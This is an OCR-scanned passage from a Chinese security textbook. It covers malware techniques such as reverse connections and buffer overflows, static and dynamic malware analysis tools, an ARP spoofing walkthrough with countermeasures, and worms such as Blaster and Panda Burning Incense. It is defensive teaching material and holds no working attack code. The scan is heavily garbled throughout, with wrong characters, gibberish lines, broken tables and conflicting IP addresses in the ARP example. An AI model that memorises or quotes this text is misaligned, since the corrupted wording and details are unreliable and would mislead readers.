部 分 恶意 代码 采用 超级 管理 技术 对 反 亚 意 代 码 软 件 系 统 进行 拒绝 服务 攻击 ,阻碍 反 恶 
意 代 码 软件 正常 运行 。 例 如 ， 国产 特洛伊 木马 广 外 女生 ”, 就 是 用 这 个 技术 成 功 攻 击 “ 金 山 
毒霸 ”和 “天 网 防火 墙 ” 的 。 

3. 端口 反 向 连接 技术 

防火 墙 对 于 外 网 进入 内 部 的 数据 流 有 严格 的 访问 控制 策略 ,但 对 于 从 内 到 外 的 数据 并 
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没有 严格 控制 。 指 令 恶 意 代 码 攻 击 的 服务 疾 ( 被 控制 痪 ) 主 动 连 接客 户 闪 (控制 冯 ) 病 口 为 反 
回 连接 扩 术 。 最 早 实 现 这 项 技术 的 木马 程序 是 国外 的 Boinet, 它 可 以 通过 ICO,IRC. HTTP 
和 反问 主动 连接 这 4 种 方式 联系 客户 中。“ 网 络 神 丛 ? 是 我 国 最 早 实 现 闪 口 反 回 连接 技术 的 
亚 意 代码 。“ 灰 铝 子 ? 则 是 这 项 拉 术 的 集大成 者 , 它 内 置 FTP、 域 名 、 服 务 端 主动 连接 这 3 种 
服务 端 在 线 通知 功能 。 

4. 缓冲 区 溢出 攻击 技术 

80% 的 远程 网 络 攻击 为 缓冲 区 洪 出 漏洞 攻击 ,能 使 Internet 一 个 匿名 用 户 有 机 会 获得 
男 一 台 主 机 的 部 分 或 全 部 的 控制 权 。 和 恶意 代码 利用 系统 和 网 络 服 务 的 安全 汤 洞 植 和 并且 执 
行 攻击 代码 ,攻击 代码 以 一 年 的 权限 运行 有 缓冲 区 洲 出 漏洞 的 程序 来 获得 被 攻击 主机 的 欣 
制 权 。 缓 冲 区 洲 出 攻击 成 为 恶意 代码 从 被 动 式 传播 转 为 主动 式 传播 的 主要 途径 之 一 。 例 
如 “红色 代 码 ” 利 用 IIS Server 上 Indexing Service 的 缓冲 区 溢出 汤 洞 完成 攻击 ,传播 和 破 
坏 等 恶意 目的 。 


5.4. 恶意 代码 的 分 析 拉 术 方 法 
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5.4.1 恶意 代码 分 析 技 术 方 法 概况 


如 图 5-2 所 示 ,恶意 代 但 的 分 析 方 法 由 静态 分 析 方 法 和 动态 分 析 方 法 两 部 分 构成 。 其 
中 静态 分 析 方 法 有 反 恶 意 代 人 码 软 件 的 检测 和 人 分析、 字符 串 分 析 和 表态 反 编 详 分 析 等 ; 动态 
分 析 包 括 文件 监测 .进程 监测 .注册 表 监 测 和 动态 反 汇 编 分 析 等 。 


恶意 代码 的 分 析 方 法 
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5-2 ”恶意 代码 的 分 析 方 法 
5.4.2 静态 分 析 技 术 方 法 


恶意 代码 的 静态 分 析 主 要 有 以 下 几 种 方法 。 

(OD 反 亚 意 代码 软件 的 检测 和 分 析 。 反 恶意 代码 软件 检测 出 恶意 代码 方法 有 特征 代码 
法 、 校 验 和 法 、 行 为 监测 法 .软件 模拟 法 等 。 根 据 恶 意 代码 的 信息 去 搜寻 更 多 的 黄 料 Ar VI us 
意 代 但 的 分 析 数 据 已 被 反 恶 意 代 码 软 件 收录 , 那 就 可 以 直接 利用 它们 的 分 析 绪 果 。 

(2) 字符 串 分 析 。 罕 符 串 分 析 的 目的 是 寻找 文件 中 使 用 的 ASCH 或 其 他 方法 编 公 的 连 
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续 字 符 串 。 一 些 有 用 的 信息 可 以 通过 在 亚 意 代码 样本 中 搜寻 字符 串 得 到 ,例如 : 

D 恶意 代码 的 名 称 ; 

O 帮助 和 命令 行 选项 ; 

G) 用 户 对 话 框 ,可 以 通过 它 分 析 恶 意 代码 的 目的 ; 

O 后门 密码 ; 

O 恶意 代码 相关 的 网 址 ; 

© 恶意 代码 作者 或 攻击 者 的 E-mail 地 址 ; 

C) 亚 意 代码 用 到 的 库 ,图 数 调用 ,以 及 其 他 的 可 执行 文件 ; 

(8) 其 他 的 有 用 的 信息 。 

(3) FAS 4 Or. MRE RASA JavaScript, Perl 或 Shell 等 脚本 语言 编写 ,那么 恶意 代码 
本 号 就 可 能 市 有 源 代码 。 通 过 文本 编辑 强 将 脚本 打开 查看 源 代 码 。 脚 本 分 析 能 帮助 分 析 者 
用 较 短 时 间 识 别 出 大 量 流行 的 脚本 类 型 , 表 5-2 列 出 了 常用 的 脚本 语言。 

表 5-2 常用 脚本 语言 





脚本 语言 在 文件 中 识别 其 特征 SCPE i H Ja BE 
Bourne Shell 以 1 #/bin/sh 开始 .sh 

Perl VAY #/usr/bin/perl 开始 . pl. perl 
JavaScript 以 < Script language — "JavaScript" > 形式 出 现 . js.. html、htm 
VBScript 包含 单词 VBScript 或 在 文件 中 散布 着 字符 vb . vbs,. html,. htm 


(4) 静态 反 编 译 分 析 。 可 以 采用 反 编 译 工具 来 查看 携带 解释 器 的 恶意 源 代 码 。 在 编译 
时 ,代码 会 被 编译 器 优化 ,组 成 部 分 被 重 写 来 使 得 程序 更 适合 解释 和 执行 ,这 个 特性 使 得 纺 
译 的 代码 不 适合 逆向 编译 。 因 此 ,逆向 编译 是 将 对 计算 机 优化 的 代码 重新 转化 为 源 代 码 ,这 
使 得 程序 结构 和 流程 分 离开 来 ,同时 变量 的 名 称 由 计算 机 自动 生成 ,这 使 得 逆向 编译 的 代码 
有 着 较 差 的 可 读 性 。 表 5-3 列 出 了 一 些 反 编译 工具 ,它们 能 够 生成 被 编译 程序 的 C 或 Java 
语言 的 源 代码 。 


R 5-3 反 编 译 工 具 






L H x a EB 下 载 地 址 
在 Windows, Linux, Bsd, Sunos 多 
Reverse Engineering 种 平台 下 将 面向 x86, SPARC, 
, ANM u | www. backerstreet. com/ 
Compiler (REC) by | SunOS, Linux, Windows| 68k, PowerPC 和 MIPS 等 多 种 体 


rec/rec. htm 


Giampiero Caprino Bb 2 T E] Ab E AS ER] FA 336 I9] Zia PE 
成 C 代码 


运行 于 UNIX 平台 上 ， 
fT UNIX PRE I Windows 的 面向 x86 体 协 结构 | www. itee ug, edu. au/— 


CC y Cristina 但 是 分 析 Windows 的 


Cifuentes exe 可 执行 文件 写 的 程序 逆向 编译 成 C. 代码 cristina/ dcc. html 
用 Java 编写 ,这 个 工 > 

JreversePro 具 可 以 在 任何 有 Java i = a TB TUES II EIR, Java jrevpro. sourceforge. net/ 
虚拟 机 的 系统 上 运行 | 

HomeBrew www. pdr. cx/ projects/ 


UNIX 系统 3 [o] 5E Java FS 


hbd/ 


Decompiler 
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(5) 静态 反 汇 编 分 析 。 有 有 线性 遍历 和 递归 遍历 两 种 方法 。GNU 程序 OBJDUMP 和 
- 些 链接 优化 工具 使 用 线性 过 历 算法 从 输入 程序 的 人 口 点 开始 反 汇 编 , 简 单 地 轴 历 程序 的 
整个 代码 区 , 反 汇 编 它 所 遇 到 的 每 一 条 指令 。 虽 然 方法 简单 TH FE TE AI Be e AP PIRA SIE TR S 
流 中 的 数据 问题 ,如 跳 转 表 。 递 归 遍 历 算 法 试图 用 反 汇 编 出 来 的 控制 流 指 令 来 指导 反 汇 编 
过 程 ,以 此 解决 上 面 线性 遍历 所 存在 的 问题 。 直 观 地 说 ,无 论 何 时 反 汇 编 句 遇 到 一 个 分 支 或 
CALL 指令 , 反 汇 编 都 从 那 条 指令 的 可 能 的 后 继 指令 继续 执行 。 很 多 的 二 进 制 传输 和 优化 
系统 采用 这 种 方法 。 正 确 判 定 间 接 控制 转移 的 可 能 目标 难度 很 大 是 存在 的 缺点 。 亚 意 代 码 
被 反 汇 编 后 ,就 可 用 控制 流 来 分 析 构 造 它 的 流程 图 ,该 图 又 可 以 被 许多 的 数据 流 分 析 工 具 所 
使 用 。 由 于 控制 流程 图 是 大 多 数 静 态 分 析 的 基础 ,因此 不 正确 的 流程 图 反 过 来 会 使 整个 静 
态 分 析 过 程 得 到 错误 的 结果 。 


5.4.3 动态 分 析 技 术 方 法 


恶意 代码 的 动态 分 析 主 要 有 以 下 几 种 方法 。 

C1) 文件 监测 。 和 恶意 代码 在 传播 和 破坏 的 过 程 中 需要 依赖 读 写 文件 系统 ,但 存在 极 少 
数 只 是 单纯 依赖 内 存 却 没 有 与 文件 系统 进行 交互 。 恶 意 代码 执行 后 ,在 目标 主机 上 可 能 进 
行 读 写 文件 ,修改 程序 .添加 文件 ,甚至 把 代码 艇 入 其 他 文件 。 由 此 对 文件 系统 必须 要 进行 
监测 FileMon 是 篆 用 的 文件 监测 程序 ,能 够 记录 与 文件 相关 的 动作 ,如 打开 、. 谈 取 、 写 人 、 
关闭 .删除 和 存储 时 间 惟 每 。 男 外 ,还 有 文件 完整 性 监测 工具 ,如 Trip wire, AIDE 等 。 

(2) 进程 监测 。 恶 意 代 码 要 人 入侵 甚至 传播 ,必须 要 有 新 的 进程 生成 或 盗用 系统 进程 的 
合法 权限 ,主机 上 所 有 被 植 人 进程 的 细节 都 能 为 分 析 亚 意 代 码 提 供 重 要 参考 信息 。 第 用 的 
进程 监测 工具 是 Process Explorer, 它 将 机 需 上 的 每 一 个 执行 中 的 程序 显示 出 来 ,将 每 一 个 
进程 的 工作 详细 展示 出 来 。 昌 然 Windows 系统 目 己 内 般 了 一 个 进程 展示 工具 ,但 是 只 显示 
了 进程 的 名 称 和 CPU ih HO ,这 不 足以 了 解 进 程 的 详细 活动 情况 。 而 Process Explorer 比 
任何 的 内 徐工 具 更 有 用 , 它 可 以 看 见 文件 .注册 表 键 值 和 进程 装载 的 全 部 动态 链接 库 的 情 
况 。 并 且 对 每 一 个 运行 的 进程 ,该 工具 还 显示 了 进程 的 属 主 、 优先 级 和 环境 变量 。 

(3) 网 络 活动 监测 。 亚 意 代 码 从 早期 单一 的 传染 形式 到 变 成 依赖 网 络 传染 的 多 种 传染 方 
式 。 因 此 分 析 恶 意 代 码 还 要 监测 恶意 代码 的 网 络 行为 。 使 用 网 络 嗅 探 器 检测 恶意 代码 传播 的 
内 容 , 当 恶意 代码 在 网 络 上 发 送 包 时 , 咒 探 兹 就 会 将 它们 捕获 。 如 果 局 域 网 是 基于 共 圣 Hub 
的 ,那么 可 以 连接 串 探 计算 机 到 任意 端口 开始 串 探 ; 如 果 是 基于 交换 机 的 ,那么 就 要 配置 一 个 
I gm El ,将 全 部 局 域 网 的 分 组 包 引 导 到 串 探 端口 上 去 。 营 用 的 网 络 监 测 工 具 如 表 5-4 所 示 。 

表 5-4 网 络 监测 工具 


TCPview 查看 端口 和 线程 www. sysinternal. com 
Fport 查看 本 机 开放 端口 ,以 及 端口 和 进程 对 应 关系 | www.foundstone. com 


开源 的 扫 摘 工具 ,用 于 系统 管理 员 查 看 一 个 大 
Nmap Linux, Windows | 型 的 网 络 有 哪些 主机 ,以 及 其 上 运行 哪 种 服 | www. insercure. org 
务 , 文 持 多 种 协议 的 扫 擂 


Nessus 是 一 款 经 典 的 安全 评估 软件 ,功能 强大 
Nessus Linux, Windows | 且 更 新 快 , 采 用 C-S Biz. ARS Atn P3 94 HE TT 
CERE, A PU HE BUE SI AB "n 
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(4) 注册 表 监 测 。Windows 操作 系统 的 注册 表 是 包含 了 操作 系统 和 大 多 数 应 用 程序 配 
置 的 层次 数据 库 , 恶 意 代 码 运 行 时 一 般 要 修改 Windows 操作 系统 的 配置 来 改变 Windows 
操作 系统 的 行为 ,实现 人 侵 目 的 。 和 常用 的 监测 软件 是 Regmon, 它 能 够 实时 显示 读 写 注册 表 
项 的 全 部 动作 。 

(5) 动态 反 汇 编 分 析 。 动 态 反 汇 编 是 指 在 恶意 代码 的 执行 过 程 中 对 其 进行 监测 和 分 
析 。 其 基本 思想 是 将 恶意 代码 运行 的 控制 权 交 给 动态 调试 工具 。 该 监测 过 程 从 代码 的 入 口 
点 处 开始 ,控制 权 在 程序 代码 与 调试 工具 之 间 来 回 传递 ,直到 程序 执行 完 为 止 。 这 种 技术 能 
得 到 正确 的 反 汇 编 代码 ,但 只 能 对 程序 中 那些 实际 执行 的 部 分 有 效 。 

目前 主要 动态 反 汇 编 分 析 方 法 有 以 下 两 种 。 

CD 同 内 存 调 试 。 这 种 方法 使 调试 工具 与 被 分 析 的 恶意 代码 程序 加 载 到 相同 的 地 址 空 
加 里 。 该 方法 的 优点 是 实现 代价 相对 较 低 ,控制 权 转 区 到 调试 工具 或 从 调试 工具 转 回 恶意 
代码 程序 的 实现 相对 来 说 比较 简单 ; 缺点 是 再 要 改变 被 分 析 程 序 的 地 址 。 

© 仿真 调试 , 即 虚 拟 调 试 。 这 种 方法 是 让 调试 工具 与 分 析 的 亚 意 代码 程序 处 于 不 同 的 
地 址 空间 ,可 绕 过 很 多 传统 动态 反 跟 踊 类 技术 。 这 种 方法 的 优点 是 不 用 修改 目标 程序 中 的 
地 址 ,但 在 进程 中 控制 权 的 转移 上 要 付出 较 高 的 代价 。 

表 5-5 列 出 了 Windows © S $ HRA LE., 

表 5-5 Windows 平台 常用 的 调试 工具 


Ollydbg 例 费 调试 希 , 图 形 界 面 , 功 能 强大 http: //home. t-online. de/home/Ollydbg 
—^r ESE i] T, RI ANAS oP Pr LR» f8] 46 ft 
本 可 以 免费 得 到 


IDA Pro 


http://www. datarescue. com 


商业 软件 ,提供 优秀 的 调试 功能 和 GUI 界面 。|www. compuware. com/ products/devpartner/ 


SoftICE 
SoftIC 支持 源 代码 和 二 进 制 调 试 softice. htm 





5.4.4 ”两 种 分 析 技 术 比 较 
恶意 代码 程序 是 静态 分 析 的 中 心 ,而 行为 是 动态 分 析 的 中 心 。 静 态 分 析 无 关于 恶意 代 


PNA. Fab Re RISA SRA BERGE 
实现 的 目标 。 动 态 分 析 是 依赖 于 有 恶意 代 人 码 的 运行 环 静态 分 析 






境 和 不 同 的 监测 目标 。 不 同 的 环境 和 不 同 的 目标 可 
能 得 到 不 同 的 动态 分 析 结 果 。 动 态 分 析 对 环境 和 目 
标的 依赖 导致 动态 分 析 的 不 完全 ,但 同时 也 将 恶意 代 
码 的 运行 环境 、 监 测 目 标 和 程序 行为 紧密 地 联系 起 
来 。 通 过 动态 分 析 可 以 看 到 ,运行 环境 的 变化 直接 引 
起 了 恶意 代码 的 内 部 行为 和 监测 结果 的 变化 。 

如 图 5-3 所 示 ,静态 分 析 根 据 代 码 内 容 推 出 执行 
的 所 有 特性 ,而 动态 分 析 是 恶意 代码 一 次 执行 或 多 次 
执行 得 到 的 特性 。 动 态 分析 不 能 证 明代 人 码 一 定 满 足 NEST 
革 个 特定 的 属性 ,但 是 可 以 检测 到 异常 的 属性 ,还 可 图 5-3 动静 态 分 析 范 围 示意 图 






”所 有 可 能 的 路 径 


可 以 执行 的 
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以 提供 关于 亚 意 代码 程序 行为 的 有 用 信息 。 静 态 分 析 或 许 会 得 到 很 多 元 余 信息 ,分 析 结 果 
会 被 元 余 信 息 所 迷惑 。 动 态 分 析 可 以 确切 地 .有 针对 性 地 得 到 分 析 所 需要 的 具体 数据 。 动 
态 分 析 和 静态 分 析 的 关系 如 图 5-3 所 示 。 

由 图 5-3 中 可 以 看 出 ,静态 分 析 和 动态 分 析 其 实 是 对 亚 意 代码 所 有 可 能 执行 的 子 集 的 
不 同 选择 。 一 个 准确 的 静态 分 析 要 考虑 到 恶意 代码 的 每 一 种 可 能 的 执行 情况 , 即 每 一 次 执 
行 时 亚 意 代码 的 全 部 可 能 状态 。 当 亚 意 代码 的 代码 量 增 加 到 一 定 程 度 时 ,静态 分 析 要 对 所 
有 状态 进行 分 析 就 不 可 行 了 ,因为 分 析 代 码 的 可 能 执行 状态 的 代价 已 不 能 接受 。 毅 态 分 析 
和 动态 分 析 不 是 对 立 的 技术 。 虽 然 静 态 分 析 和 动态 分 析 有 很 大 差别 ,应 用 于 同一 恶意 代码 
时 代价 不 同 , 结 果 也 不 同 ,但 静态 分 析 和 动态 分 析 可 以 使 用 相同 的 分 析 手 段 。 静 态 分 析 和 动 
态 分 析 使 用 在 不 同 阶段 ,能 够 互相 补充 支持 。 亚 意 代 码 的 程序 和 行为 之 间 有 着 强烈 的 依赖 
关系 ,决定 了 动态 分 析 和 静态 分 析 相 结合 能 达到 更 好 的 分 析 效 果 。 不 同 的 分 析 可 以 收集 到 
不 同 的 有 用 信息 ,对 恶意 代码 分 析 应 先 执行 静态 分 析 后 青 执行 动态 分 析 , 比 单独 地 执行 任 一 
种 分 析 更 有 效 。 毅 态 分 析 能 够 规避 动态 分 析 收 集 的 信息 充分 性 差 的 缺点 ,而 动态 分 析 能 人 够 
收集 针对 性 强 的 少量 信息 。 


5.5 WU ESO XC tS ye 
5.5.1 典型 计算 机 病毒 攻击 与 防 学 


1. 计算 机 病毒 攻击 

长 期 以 来 ,人 们 设计 计算 机 忽略 了 安全 问题 。 计 算 机 系统 的 脆弱 性 ,为 计算 机 病毒 的 产 
生 和 传播 提供 了 可 能 。 万维网 使 地 球 一 体 化 ,为 计算 机 病毒 的 传播 提供 了 可 能 的 空间 。 新 
的 计算 机 技术 不 断 发 展 应 用 ,为 计算 机 病毒 提供 了 一 定 的 条 件 。 国 外 专家 认为 ,分 布 式 数字 
处 理 、 可 重 编 程 租 入 计 算 机 、 网 络 化 通信 的 信息 格式 等 都 为 计算 机 病毒 侵入 提供 了 可 能 。 

计算 机 病毒 入侵 技术 和 病毒 有 效 注 入 方法 研究 的 内 容 相 近 。 从 目前 现状 来 看 ,病毒 注 
人 方法 主要 有 以 下 几 种 。 

(D 无 线 电 方式 。 主 要 是 将 病毒 码 通过 无 线 电 的 方式 发 射 到 对 方 电 子 系统 。 这 是 计算 
机 病毒 注入 的 最 佳 方式 ,但 是 技术 实现 最 难 。 

(2) 固化 式 方法 。 即 把 事先 存放 有 病毒 的 硬件 或 软件 直接 或 间接 交 给 对 方 , 该 病毒 直 
接 将 对 方 的 电子 系统 传染 ,再 在 需要 时 将 其 激活 来 进行 攻击 。 这 种 攻击 方法 过 于 隐蔽 ,即使 
彻 查 也 不 能 完全 排除 是 否 有 其 他 特殊 功能 。 目 前 ,我 国 还 需要 从 国外 进口 很 多 计算 机 组 件 ， 
故 蕊 片 攻 击 不 能 完全 避免 。 

(3) 后 门 攻 击 方式 。 后 门 是 由 软件 设计 师 或 维护 人 员 设 计 发 明 的 ,是 一 个 允许 知道 后 
门 存 在 的 人 绕 过 正常 安全 防护 措施 进入 系统 的 漏洞 。 计 算 机 入 侵 者 常常 通过 后 门 来 采取 攻 
击 ,如 Windows98 就 存在 后 门 。 

(4) 数据 控制 链 侵 入 方式 。 随 着 网 络 的 发 展 ,计算 机 病毒 可 以 通过 数据 控制 链 侵 入 计 
算 机 系统 。 利 用 远程 修改 技术 可 以 很 直接 方便 地 改变 数据 控制 链 的 正常 路 径 。 

2. 对 计算 机 病毒 攻击 的 防范 对 策 和 方法 

CD 建立 有 效 的 计算 机 病毒 防护 体系 。 有 效 的 计算 机 病毒 防护 体系 应 包括 多 个 防护 
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E. OUT E: 四 病毒 检测 层 ; QAE tJa; 由 病毒 清除 层 ; CRAKE; OMA 
计划 层 。 

(2) 严 把 便 件 安全 关 。 涉 及 国家 机 密 系 统 的 设备 及 产品 ,应 该 尽量 使 用 国产 ; 对 引进 
的 计算 机 系统 要 在 进行 安全 性 检查 后 才能 使 用 ,避免 和 控制 计算 机 病毒 伺机 人 侵 。 

(3) 防止 电磁 辐射 和 电磁 泄露 。 使 用 电磁 屏蔽 的 方法 阻 断 电 磁 波 辐射 ,同时 还 能 够 有 
AOC ane Se,“ HEL RA A EN SA” oa EE AY IUE o 

C4) Jo EE OBL eB oP BA ET. MT A TE RBH RC OT A ,以 解决 计算 机 防 
御 性 的 有 关 问 题 。 

3. ARP 病毒 攻击 与 防范 

(D ARP 协议 工作 原理 。 数 据 包 在 以 太 网 中 传输 的 形式 是 根据 其 首部 的 MAC 地 址 来 
进行 寻 址 的 以 太 包 。 发 送 方 必须 知道 目的 主机 的 MAC 地 址 才能 向 其 发 送 数 据 。ARP 协 
议 把 32b 的 IP 逻辑 地 址 转换 为 48b 的 以 太 网 物理 地 址 。 

因为 每 个 主机 上 都 有 一 个 ARP 高速 缓 存 , 所 以 ARP 才能 够 高 效 运行 。 最 近 IP 地 址 到 
MAC 地 址 之 间 的 映射 记录 被 存放 在 这 个 高 速 缓 存 中 ,存放 时 间 一 般 为 20 分 钟 。 

人 们 可 以 用 ARP 命令 来 检查 ARP 高 速 缓存 。 人 参数 -a 的 意思 是 显示 高 速 缓存 中 所 有 
的 内 容 , 如 图 5-4 所 示 。 


IC: Users \Administrator>arp m! 


jE[]: 192.168.1.118 ——- Axið 
Internet 地 址 To S HIE 
192.168.1. a8-15-4d-fe-1e-5a 
192.168.1. b8-88-e3-f 7-4e-3F 
192.168.1- 74—e5—43-88-9d—-3f 
192.168.1. a4—1'7-31-f 7-a8-44 
192.168.1. 9üB-1e-64-3b-82-f6 


图 5-4 JH ARP 命令 来 检查 ARP 高 速 缓存 





TEE tU TCP/IP 协议 的 计算 机 中 都 有 一 个 IP 地 址 与 MAC 地 址 对 应 的 ARP 2€ 
FK. 

(2) ARP 协议 安全 漏洞 。ARP 是 建立 在 相互 信任 的 各 个 主机 之 间 的 局 域 网 协议 ,是 存 
在 安全 漏洞 的 。 

主机 地 址 映射 表 基 于 高 速 缓存 及 动态 更 新 。 恶 意 用 户 如 果 在 下 次 交换 前 MAC 地 
址 刷新 时 限 内 成 功 地 修改 了 被 欺骗 计算 机 上 的 地 址 缓存 ,就 有 可 能 发 生 假冒 或 拒绝 服务 
攻击 。 

ARP 协议 是 一 个 无 状态 的 协议 。 接 收 到 ARP 应 答 帧 ,主机 就 会 更 新 本 地 的 ARP 
缓存 ,不 要 求 主机 必须 先 发 送 ARP 请 求 后 才能 接收 ARP 应 答 ,而 是 百 接 把 应 答 帧 中 的 IP 
Hh hk A MAC 地 址 存储 在 ARP 高 速 缓存 中 。 

O 在 通信 中 ,ARP 缓存 的 优先 级 最 高 。 

上 述 缺 陷 很 容易 被 利用 伪造 IP 地 址 进行 ARP 期 骗 。 

(3) ARP 欺骗 病毒 。 假 定 在 一 个 局 域 网 中 有 3 台 计 算 机 ,它们 的 IP 地 址 和 MAC H ht 
分 别 如 下 : 

主机 A 的 IP 地 址 为 192. 168. 1.10, 网 卡 地 址 为 01-0e-2d-73-65-17; 
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主机 B 的 IP 地 址 为 192. 168. 1. 20 ,网 卡 地 址 为 00-1f-6d-c3-32-04; 

主机 C AY IP 地 址 为 192. 168. 1. 30 ,网 卡 地 址 为 03-cc-4e-d5-1a-27, 

MFR EOL C HS EOLA 与 主机 也 通信 ,可 利用 ARP 协议 的 漏洞 , 冒 用 主机 也 的 名 义 
与 主机 A 通信 ,同时 冒 用 主机 A 的 名 义 与 主机 也 通信 。 

主机 C fe EDL A 发 送 ARP 应 答 报 文 ,在 应 答 报 文中 将 主机 也 的 卫 地 址 192.168.0. 20 
与 主机 C 的 网 卡 地 址 对 应 ,当主 机 A 收 到 ARP 应 答 报 文 时 ,更 新 ARP 高 速 缓存 ,增加 
“192. 168. 0. 20 <->03-cc-4e-d5-1a-27” 项 。 同 时 ,主机 C. [8] dE BL D AIK ARP 应 答 报 文 , 在 
响应 报 文中 将 主机 A 的 IP 地 址 192. 168. 0.10 与 主机 CC 的 网 卡 地 址 对 应 ,当主 机 B 收 到 
ARP 应 答 报 文 时 ,更 新 ARP 高 速 缓存 ,增加 "192. 168.0.10<->03-cc-4e-d5-1a-27” 项 。 这 
样 ,当主 机 A 再 与 主机 也 通信 时 ,其 数据 包 会 发 送 到 网 卡 地 址 为 03-cc-4e-d5-1a-27 的 主机 C 
E; 当主 机 B 与 主机 A 通信 时 ,数据 包 也 会 发 送 到 网 卡 地 址 为 03-cc-4e-d5-1a-27 的 主机 C 
上 。 如 果 主 机 C 能 够 实现 自动 路 由 转发 ,就 可 以 在 不 影 啊 主机 A 与 主机 也 之 间 通 信 的 前 提 
bb wur]. 

但 如 果 前 面 主机 C 发 给 主机 A 的 ARP 更 新 包 中 的 MAC 地 址 不 是 日 己 的 ,而 是 伪造 
的 根本 不 存在 MAC 地 址 ,那么 这 时 主机 A 和 主机 B 之 间 就 不 可 能 再 正常 通信 了 ,这 就 是 
ARP 病毒 对 PC 在 网 络 间 通 信 造 成 数据 被 罚 听 或 网 络 不 通 的 严重 后 琳 。 

局 域 网 通信 发 生 在 主机 与 主机 之 间 ,要 与 外 网 的 主机 通信 ,需要 网 关 或 路 由 善 (一 般 局 
域 网 的 路 由 器 可 直接 充当 网 关 的 角色 )。 如 果 局 域 网 内 的 某 台 主机 A 想 要 与 外 网 的 主机 通 
信 ,那么 在 封装 数据 包 时 ,目标 MAC 地 址 需要 写成 网 关 的 MAC 地 址 ,网 关 再 进行 转发 ,发 
到 网 外 去 。 如 果 这 台 主 机 A 使 用 ARP 数据 包 请 求 网 关 的 MAC 地 址 时 ,出 现 一 侣 另 有 目 
的 的 主机 加 主机 A 回应 了 一 个 ARP 应 答 报 文 , 数 据 包 就 将 这 人 台 病 毒 主机 的 MAC 地 址 或 
根本 不 存在 的 MAC 地 址 告诉 主机 A, 这 时 主机 A 发 给 远程 网 络 的 数据 由 于 经 过 另 有 目的 
HS E HLE Io, c c Bi UT TRAY MAC 地 址 ,而 最 终 没 有 网 关 对 数据 进行 转发 ,导致 与 外 网 
不 能 正常 通信 。 所 以 ARP 病毒 也 能 影 啊 局 域 网 与 外 网 的 通信 。 

(4) ARP 病毒 防范 。 

CD 使 用 静态 ARP 表 。 停 止 使 用 地 址 动态 绑 定 和 ARP MIRAE BRM. FE 
ARP ri xk SX f£ D EK AL IP 地 址 与 便 件 地 址 映射 表 , 人 允许 由 系统 管理 人 员 进 行人 工 
修改 。 

© 受托 主机 的 永久 条 目 放 置 于 路 由 器 的 ARP 高 速 缓存 中 ,能 有 效 地 减少 ARP 欺骗 。 

O 会 话 加 密 。 不 应 把 网 络 安全 信任 关系 建立 在 IP 地 址 或 便 件 MAC 地 址 的 基础 上 ,而 
是 应 该 对 所 传输 的 重要 数据 事先 进行 加 密 , 青 开始 传输 。 

O 使 用 ARP 服务 器 。 在 确保 这 台 ARP 服务 硕 不 被 黑客 攻击 的 情况 下 通过 该 服务 硕 
查找 ARP 转换 表 来 啊 应 其 他 机 器 的 ARP 广播 。 


5.5.2 上 典型 网 络 蠕虫 攻击 与 防 沁 

网 络 蠕 虫 骏 发 后 ,造成 了 巨大 经 济 损失 。 通 过 人 研究 分 析 所 利用 的 系统 汤 洞 和 攻击 手段 ， 
进行 特征 分 析 , 及 时 补救 ,消除 主机 上 的 蠕 虫 体 , 为 未 来 检测 防范 该 蠕虫 提供 有 效 信 息 。 

1. 网 络 蠕虫 攻击 模式 

C1) 对 电子 邮件 的 攻击 。 这 种 内 部 含有 上 月 动 搜 索 邮 件 服务 英和 地 址 的 机 制 蠕虫 程 厅 ， 
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利用 本 地 邮件 客户 端的 漏洞 ,将 寄 发 病毒 邮件 给 搜索 到 的 邮件 地 址 。 这 类 晴 虫 有 很 多 ,其 中 
的 代表 有 :Netsky. C,D,Q,P( 网 络 天 空 及 其 变种 ); Beagle. B. C. F.I. H. M. N.Q.U.X.Z 
EREKET). 

(2) AFEERI. A Bt dm deb hu E — Ae He — 7A BS h A BE. E E NL 
产生 IP 并 尝试 溢出 ,之 后 复制 月 时。 被 感染 的 系统 性 能 速度 会 快速 降低 ,甚至 朋 沉 。 一 般 
此 类 蠕虫 都 是 针对 微软 的 系统 漏洞 发 起 攻击 ,名 最 新 补丁 没有 及 时 安装 , 便 会 感染 。 

(3) 对 于 文件 共 于 服务 的 攻击 。 对 于 目前 流行 的 P2P 系统 ,网 络 用 户 之 间 可 以 分 享 和 披 
此 计算 机 中 的 文件 ,此 类 蠕虫 就 是 利用 这 一 服务 ,将 自己 隐藏 在 共享 目录 下 ,通过 伪装 成 一 


个 第 用 软件 使 其 他 用 户 下 载 并 执行 。 


2. 冲击 波 蠕虫 eae 
冲击 波 蠕 忠 和 震荡 波 蠕 虫 使 用 的 都 是 常用 的 扫描 策略 对 目标 主机 特定 端口 进行 大 量 的 
连接 尝试 ,连接 成 功 后 蠕虫 程序 会 在 目标 主机 和 被 感染 主机 之 间 建 立 连接 ,传送 蠕虫 副本 。 
C1) 贤 虫 特征 。 为 了 便于 分 析 , 神 击 波 晴 里 和 晨 沪 波 晴 里 的 特征 如 表 5-6 所 示 。 
zx 5-6 冲击 波 蠕 虫 和 震 沪 波 蠕虫 的 特征 
re TCP135 HE 
rer us ain 


(2) BRIA We. vhi UE 5s CRUS 15 Ux fus HII] 34 Hh We Wer EG BE f] SE . TE A 3108 9d 26 EST DR OST 
目标 IP 地 址 做 限定 ,常常 会 扫描 一 些 尚 未 被 分 配 的 IP 地 址 空间 ,被 称 为 网 络 黑洞 。 可 以 通 
过 对 与 网 络 黑洞 相关 的 数据 包 进 行 监控 和 分 析 及 时 发 现 攻击 行为 。 

只 凭 信 对 网 络 黑洞 的 扫 摘 很 难 立 即 判定 此 行为 就 是 网 络 晴 虫 发 起 的 攻击 行为 。 由 于 每 

-种 网 络 蠕虫 都 有 各 和 月 明显 的 特征 ,在 发 现 可 疑 行为 后 ,不 应 急于 对 它 定 性 ,而 应 进一步 进 
行 特征 匹配 操作 。 一 般 网 络 蠕虫 在 攻击 成 功 后 ,会 癌 被 攻击 的 计算 机 传送 和 目 身 的 可 执行 文 
件 。 基 于 特征 匹配 为 这 些 文件 建立 特征 ,可 以 及 时 发 现 计 算 机 中 是 否 存 在 相应 的 网 络 蠕虫 
TH. 

3.“ 能 猫 烧香 ”蠕虫 

(1) 蠕虫 特征 。“ 能 猫 烧香 ”蠕虫 一 个 重要 特征 就 是 在 感染 主机 的 时 ,会 在 磁盘 中 产生 
大 量 的 destop .ini 系统 只 读 文 件 。 “熊猫 烧香 ”里 虫 还 会 镭 取 目标 主机 经 党 使 用 的 邮箱 地 
